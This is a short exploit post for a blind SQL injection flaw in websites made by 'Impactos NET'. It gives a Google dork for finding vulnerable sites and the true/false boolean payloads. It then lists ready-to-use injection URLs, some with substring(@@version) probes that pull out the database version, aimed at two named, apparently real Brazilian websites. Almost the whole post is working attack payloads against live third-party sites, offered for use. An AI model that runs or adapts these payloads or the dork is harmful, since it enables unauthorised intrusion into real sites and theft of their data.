********************************************************* #Exploit Title: Impactos NET - Blind Sql Injection Vulnerability #Date: 2024-10-17 #Exploit Author: Behrouz Mansoori #Google Dork: "by: Impactos NET" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://bonfapel.com.br/produtos.php?fil=fornecedor&id=78%27%20and%20true--+ * https://bonfapel.com.br/produtos.php?fil=fornecedor&id=78%27%20and%20false--+ * https://bonfapel.com.br/produtos.php?fil=fornecedor&id=78%27%20and%20substring(@@version,1,1)=1--+ ### Demo 2: * https://apcdsantoandre.com.br/index.php?link=paginas&id=2%27%20and%20true--+ * https://apcdsantoandre.com.br/index.php?link=paginas&id=2%27%20and%20false--+ * https://apcdsantoandre.com.br/index.php?link=paginas&id=2%27%20and%20substring(@@version,1,1)=5--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************